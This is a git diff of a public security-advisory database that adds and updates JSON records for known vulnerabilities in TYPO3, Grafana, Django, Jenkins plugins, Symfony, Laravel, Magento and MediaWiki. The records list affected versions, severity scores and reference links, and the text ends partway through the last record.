+ { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/install" + }, + { + "type": "WEB", + "url": "http://secunia.com/advisories/35770" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" + }, + { + "type": "WEB", + "url": "http://www.osvdb.org/70120" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/45470" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:35:28Z", + "nvd_published_at": "2012-05-21T20:55:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json b/advisories/github-reviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json new file mode 100644 index 0000000000000..fe9642fd6aae3 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-9hv8-4frf-cprf/GHSA-9hv8-4frf-cprf.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hv8-4frf-cprf", + "modified": "2024-02-01T21:47:17Z", + "published": "2022-05-24T17:18:56Z", + "aliases": [ + "CVE-2018-18624" + ], + "summary": "Grafana XSS via a column style", + "details": "Grafana has a XSS vulnerability via a column style on the \"Dashboard > Table Panel\" screen. NOTE: this issue exists because of an incomplete fix for CVE-2018-12099.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18624" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/11813" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/23816" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/0284747c88eb9435899006d26ffaf65f89dec88e" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200608-0008/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:47:17Z", + "nvd_published_at": "2020-06-02T17:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json b/advisories/github-reviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json new file mode 100644 index 0000000000000..052629b39e824 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-9hw3-4gvp-8mv5/GHSA-9hw3-4gvp-8mv5.json @@ -0,0 +1,105 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hw3-4gvp-8mv5", + "modified": "2024-02-07T23:48:05Z", + "published": "2022-05-17T01:55:59Z", + "aliases": [ + "CVE-2010-5097" + ], + "summary": "TYPO3 Cross-site scripting (XSS) vulnerability in the click enlarge functionality", + "details": "Cross-site scripting (XSS) vulnerability in the click enlarge functionality in TYPO3 4.3.x before 4.3.9 and 4.4.x before 4.4.5 when the caching framework is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5097" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64178" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/frontend" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20110201071734/http://secunia.com/advisories/35770" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111223211753/http://www.securityfocus.com/bid/45470" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/12/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:48:05Z", + "nvd_published_at": "2012-05-21T20:55:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json b/advisories/github-reviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json new file mode 100644 index 0000000000000..b817b2bb5dc08 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-9jrh-hch8-rr5c/GHSA-9jrh-hch8-rr5c.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9jrh-hch8-rr5c", + "modified": "2024-01-30T22:38:38Z", + "published": "2022-05-14T03:23:41Z", + "aliases": [ + "CVE-2018-1000148" + ], + "summary": "Jenkins Copy To Slave Plugin allows access to arbitrary files on the Jenkins controller file system ", + "details": "An exposure of sensitive information vulnerability exists in Jenkins Copy To Slave Plugin version 1.4.4 and older in CopyToSlaveBuildWrapper.java that allows attackers with permission to configure jobs to read arbitrary files from the Jenkins master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:copy-to-slave" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.4.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000148" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-03-26/#SECURITY-545" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:38:38Z", + "nvd_published_at": "2018-04-05T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json b/advisories/github-reviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json new file mode 100644 index 0000000000000..ab6dcf720adda --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9r7f-rqhw-j8h8", + "modified": "2024-01-30T21:57:28Z", + "published": "2022-05-13T01:18:43Z", + "aliases": [ + "CVE-2018-1000015" + ], + "summary": "Incorrect permission checks in Pipeline: Nodes and Processes plugin", + "details": "On Jenkins instances with Authorize Project plugin, the authentication associated with a build may lack the Computer/Build permission on some agents. This did not prevent the execution of Pipeline `node` blocks on those agents due to incorrect permissions checks in Pipeline: Nodes and Processes plugin 2.17 and earlier.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins.workflow:workflow-durable-task-step" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.18" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.17" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000015" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:57:28Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json b/advisories/github-reviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json new file mode 100644 index 0000000000000..16bb33cd68b9c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9rx5-w522-5fh7", + "modified": "2024-01-30T22:43:31Z", + "published": "2022-05-13T01:48:32Z", + "aliases": [ + "CVE-2018-1000114" + ], + "summary": "Jenkins Promoted Builds Plugin allowed unauthorized users to run some promotion processes", + "details": "An improper authorization vulnerability exists in Jenkins Promoted Builds Plugin 2.31.1 and earlier in Status.java and ManualCondition.java that allow an attacker with read access to jobs to perform promotions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:promoted-builds" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.31.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000114" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-746" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:43:31Z", + "nvd_published_at": "2018-03-13T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-9wr9-fw9v-8fgr/GHSA-9wr9-fw9v-8fgr.json b/advisories/github-reviewed/2022/05/GHSA-9wr9-fw9v-8fgr/GHSA-9wr9-fw9v-8fgr.json index cdfcaa3e99eff..7eae0310285d9 100644 --- a/advisories/github-reviewed/2022/05/GHSA-9wr9-fw9v-8fgr/GHSA-9wr9-fw9v-8fgr.json +++ b/advisories/github-reviewed/2022/05/GHSA-9wr9-fw9v-8fgr/GHSA-9wr9-fw9v-8fgr.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8141" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8141.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json b/advisories/github-reviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json new file mode 100644 index 0000000000000..7b73e832eb33d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json @@ -0,0 +1,109 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xg7-gg9m-rmq9", + "modified": "2024-02-08T21:27:24Z", + "published": "2022-05-02T03:37:17Z", + "aliases": [ + "CVE-2009-2659" + ], + "summary": "Django Admin Media Handler Vulnerable to Directory Traversal", + "details": "The Admin media handler in `core/servers/basehttp.py` in Django 1.0 and 0.96 does not properly map URL requests to expected \"static media files,\" which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a crafted URL.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.96.0" + }, + { + "fixed": "0.96.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "Django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0" + }, + { + "fixed": "1.0.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2659" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/da85d76fd6ca846f3b0ff414e042ddb5e62e2e69" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/df7f917b7f51ba969faa49d000ffc79572c5dcb4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/django/django" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111211001428/http://www.securityfocus.com/bid/35859" + }, + { + "type": "WEB", + "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00055.html" + }, + { + "type": "WEB", + "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00069.html" + }, + { + "type": "WEB", + "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=539134" + }, + { + "type": "WEB", + "url": "http://code.djangoproject.com/changeset/11353" + }, + { + "type": "WEB", + "url": "http://www.djangoproject.com/weblog/2009/jul/28/security/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2009/07/29/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:27:24Z", + "nvd_published_at": "2009-08-04T16:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-c2v7-j5gq-wcq4/GHSA-c2v7-j5gq-wcq4.json b/advisories/github-reviewed/2022/05/GHSA-c2v7-j5gq-wcq4/GHSA-c2v7-j5gq-wcq4.json index b273742922a4e..7bc53755625d8 100644 --- a/advisories/github-reviewed/2022/05/GHSA-c2v7-j5gq-wcq4/GHSA-c2v7-j5gq-wcq4.json +++ b/advisories/github-reviewed/2022/05/GHSA-c2v7-j5gq-wcq4/GHSA-c2v7-j5gq-wcq4.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "illuminate/auth" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.5.10" + } + ] + } + ] } ], "references": [ @@ -44,6 +63,14 @@ "type": "WEB", "url": "https://github.com/laravel/framework/pull/21320" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/illuminate/auth/CVE-2017-14775.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/laravel/framework/CVE-2017-14775.yaml" + }, { "type": "WEB", "url": "https://github.com/laravel/framework/releases/tag/v5.5.10" diff --git a/advisories/github-reviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json b/advisories/github-reviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json new file mode 100644 index 0000000000000..3428a1d4ee967 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3r5-vxj6-62mc", + "modified": "2024-01-30T21:23:30Z", + "published": "2022-05-24T16:52:46Z", + "aliases": [ + "CVE-2019-10379" + ], + "summary": "Jenkins Google Cloud Messaging Notification Plugin stores credentials in plain text ", + "details": "Jenkins Google Cloud Messaging Notification Plugin 1.0 and earlier stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:gcm-notification" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10379" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-591" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:23:30Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json b/advisories/github-reviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json new file mode 100644 index 0000000000000..0ec888e5ec98b --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3wf-rrhq-rfp2", + "modified": "2024-01-30T21:13:36Z", + "published": "2022-05-24T17:03:47Z", + "aliases": [ + "CVE-2019-16560" + ], + "summary": "Cross-site request forgery vulnerability in Jenkins WebSphere Deployer Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins WebSphere Deployer Plugin 1.6.1 and earlier allows attackers to perform connection tests and determine whether files with an attacker-specified path exist on the Jenkins master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:websphere-deployer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.6.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16560" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1371" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:13:36Z", + "nvd_published_at": "2019-12-17T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-c49r-8gj6-768r/GHSA-c49r-8gj6-768r.json b/advisories/github-reviewed/2022/05/GHSA-c49r-8gj6-768r/GHSA-c49r-8gj6-768r.json index 38692d6241874..db993605bcc61 100644 --- a/advisories/github-reviewed/2022/05/GHSA-c49r-8gj6-768r/GHSA-c49r-8gj6-768r.json +++ b/advisories/github-reviewed/2022/05/GHSA-c49r-8gj6-768r/GHSA-c49r-8gj6-768r.json @@ -15,6 +15,82 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/intl" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/intl" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.31" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/intl" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/intl" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.13" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -32,10 +108,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.7.37" - } + ] }, { "package": { @@ -54,10 +127,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.8.30" - } + ] }, { "package": { @@ -69,17 +139,14 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.2.0" + "introduced": "3.0.0" }, { "fixed": "3.2.14" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.2.13" - } + ] }, { "package": { @@ -98,10 +165,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.3.12" - } + ] } ], "references": [ @@ -113,6 +177,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/pull/24994" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/intl/CVE-2017-16654.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2017-16654.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -125,6 +197,10 @@ "type": "WEB", "url": "https://symfony.com/blog/cve-2017-16654-intl-bundle-readers-breaking-out-of-paths" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2017-16654" + }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4262" diff --git a/advisories/github-reviewed/2022/05/GHSA-c4r2-3f9r-rwp8/GHSA-c4r2-3f9r-rwp8.json b/advisories/github-reviewed/2022/05/GHSA-c4r2-3f9r-rwp8/GHSA-c4r2-3f9r-rwp8.json index d06ebaeb6830d..53007e4c5fec6 100644 --- a/advisories/github-reviewed/2022/05/GHSA-c4r2-3f9r-rwp8/GHSA-c4r2-3f9r-rwp8.json +++ b/advisories/github-reviewed/2022/05/GHSA-c4r2-3f9r-rwp8/GHSA-c4r2-3f9r-rwp8.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8113" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8113.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json b/advisories/github-reviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json new file mode 100644 index 0000000000000..1d484289a307e --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json @@ -0,0 +1,131 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c73w-4rcj-2622", + "modified": "2024-02-08T21:58:48Z", + "published": "2022-05-02T03:47:10Z", + "aliases": [ + "CVE-2009-3636" + ], + "summary": "Typo3 API Install Tool vulnerable to Cross-site Scripting", + "details": "Cross-site scripting (XSS) vulnerability in the Install Tool subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.0.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3alpha1" + }, + { + "fixed": "4.3beta2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3636" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53929" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/install" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125633199111438&w=2" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:58:48Z", + "nvd_published_at": "2009-11-02T15:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json b/advisories/github-reviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json new file mode 100644 index 0000000000000..23932510f9407 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c8qr-vfjf-62q3", + "modified": "2024-01-30T22:29:21Z", + "published": "2022-05-13T01:36:51Z", + "aliases": [ + "CVE-2017-2654" + ], + "summary": "Emails were sent to addresses not associated with actual users of Jenkins by Email Extension Plugin", + "details": "jenkins-email-ext before version 2.57.1 is vulnerable to an Information Exposure. The Email Extension Plugins is able to send emails to a dynamically created list of users based on the changelogs, like authors of SCM changes since the last successful build. This could in some cases result in emails being sent to people who have no user account in Jenkins, and in rare cases even people who were not involved in whatever project was being built, due to some mapping based on the local-part of email addresses.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:email-ext" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.57.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2654" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2654" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-03-20/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:29:21Z", + "nvd_published_at": "2018-08-06T22:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json b/advisories/github-reviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json similarity index 77% rename from advisories/unreviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json rename to advisories/github-reviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json index 8571269c5832a..f08c3eef915ef 100644 --- a/advisories/unreviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json +++ b/advisories/github-reviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-c8wv-qwwc-6j73", - "modified": "2023-05-22T00:30:18Z", + "modified": "2024-02-01T21:50:08Z", "published": "2022-05-24T19:17:14Z", "aliases": [ "CVE-2021-41800" ], + "summary": "MediaWiki allows a denial of service", "details": "MediaWiki before 1.36.2 allows a denial of service (resource consumption because of lengthy query processing time). Visiting Special:Contributions can 